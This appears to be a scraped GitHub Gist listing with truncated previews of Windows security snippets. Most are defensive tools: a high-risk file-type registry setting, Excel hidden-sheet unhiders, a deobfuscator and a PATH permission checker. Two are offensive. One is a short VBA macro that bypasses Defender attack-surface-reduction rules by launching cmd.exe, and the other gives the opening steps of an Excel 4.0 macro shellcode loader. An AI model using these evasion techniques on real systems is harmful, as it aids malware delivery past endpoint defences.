Philippe Lagadec decalage2
wdormann
/ dangerous.reg
Created Aug 11, 2022
Have Windows treat dangerous files as, well, dangerous. List courtesy @Laughing_Mantis
View dangerous.reg
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Windows Registry Editor Version 5.00 | |
| [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations] | |
| "HighRiskFileTypes"=".appinstaller;.application;.appx;.appxbundle;.diagcab;.diagpkg;.diagcfg;.fluid;.fxb;.glb;.gltf;.library-ms;.loop;.msix;.partial;.perfmoncfg;.pko;.ply;.ppkg;.qds;.rat;.resmoncfg;.search-ms;.searchConnector-ms;.settingcontent-ms;.stl;.symlink;.theme;.themepack;.UDL;.url;.wab;.wbcat;.wcx;.website;.whiteboard;.xbap;.ZFSendToTarget;" |
View unhide.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # -*- coding: utf-8 -*- | |
| from __future__ import print_function | |
| import os | |
| import sys | |
| try: | |
| import olefile |
kirk-sayre-work
/ gist:cee5cfb9d4bb1becc14fd1dd1df22601
Created Apr 10, 2020
Unhide Very Hidden Excel 97 Sheets
View gist:cee5cfb9d4bb1becc14fd1dd1df22601
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Unhide all the very hidden sheets in an Office 97 Excel file. | |
| from __future__ import print_function | |
| import re | |
| import sys | |
| # Read in the Excel file for which to unhide sheets. | |
| fname = sys.argv[1] | |
| f = open(fname, 'rb') | |
| data = f.read() |
View loadPcap.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| from scapy.all import * | |
| from py2neo import Graph, Node, Relationship | |
| packets = rdpcap("<your_pcap_file>") | |
| g = Graph(password="<your_neo4j_password>") | |
| for packet in packets.sessions(): | |
| pkt = packet.split() |
Arno0x
/ shellcode.xlsm
Last active Aug 16, 2022
XLM (Excel 4.0 macro) to execute a shellcode into Excel (32 bits) - French Macro code
View shellcode.xlsm
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| BEWARE: THIS WILL ONLY WORK IN A FRENCH VERSION OF MS-OFFICE/EXCEL | |
| 1. Open Excel | |
| 2. Click on the active tab | |
| 3. Select "Insérer" | |
| 4. Click on "Macro MS Excel 4.0". | |
| 5. This will create a new worksheet called "Macro1" | |
| ================================================================================ | |
| In the Macro1 worksheet, paste the following block in cells in column A, starting in cell A1: |
View theircorp.tlb
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://ghostbin.com/paste/4x325 | |
| <o><o><o><o><o><o><o><o><o><o><o><o><o><o><o><o><o><o><o><o><o><o><o><o><o><o> | |
| * * * * * * * * * * * * * * * * * * * * * | |
| * * | |
| * * | |
| * The Unofficial * | |
| * * |
infosecn1nja
/ ASR Rules Bypass.vba
Last active Jun 30, 2022
ASR rules bypass creating child processes
View ASR Rules Bypass.vba
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' ASR rules bypass creating child processes | |
| ' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction | |
| ' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office | |
| ' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule | |
| Sub ASR_blocked() | |
| Dim WSHShell As Object | |
| Set WSHShell = CreateObject("Wscript.Shell") | |
| WSHShell.Run "cmd.exe" | |
| End Sub |
struppigel
/ dedosfuscator.py
Created Jul 26, 2018
Deobfuscates Batch script in https://www.gdatasoftware.com/blog/2018/07/30924-g-data-analysis-discovers-dosfuscation-in-the-wild
View dedosfuscator.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys | |
| import re | |
| if len(sys.argv) <= 1: exit() | |
| scriptpath = sys.argv[1] | |
| with open(scriptpath, 'r') as scriptfile: | |
| script = scriptfile.read().replace('^', '') | |
| p = re.compile('\([Ss][Ee][Tt][^=]+=([^&]+)&&') | |
| s = p.search(script) |
wdormann
/ acltest.ps1
Created May 1, 2018
Check for paths that are writable by normal users, but are in the system-wide Windows path. Any such directory allows for privilege escalation.
View acltest.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| If (([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) { | |
| Write-Warning "This script will not function with administrative privileges. Please run as a normal user." | |
| Break | |
| } | |
| $outfile = "acltestfile" | |
| set-variable -name paths -value (Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment' -Name PATH).path.Split(";") | |
| Foreach ($path in $paths) { | |
| # This prints a table of ACLs | |
| # get-acl $path | %{ $_.Access } | ft -Wrap -AutoSize -property IdentityReference, AccessControlType, FileSystemRights |
leechristensen
/ settingcontent-ms.xsd
Created Jun 22, 2017
.settingcontent-ms XML Schema (embedded in shell.dll)
View settingcontent-ms.xsd
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="utf-8"?> | |
| <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ac="http://schemas.microsoft.com/Search/2013/SettingContent" targetNamespace="http://schemas.microsoft.com/Search/2013/SettingContent" elementFormDefault="qualified" > | |
| <xsd:annotation> | |
| <xsd:documentation xml:lang="en">Copyright (C) Microsoft. All rights reserved. | |
| Searchable setting content file schema. | |
| </xsd:documentation> | |
| </xsd:annotation> | |
| <xsd:element name="SearchableContent" type="ac:SearchableContentType"/> | |
| <xsd:complexType name="SearchableContentType"> | |
| <xsd:sequence> |
NewerOlder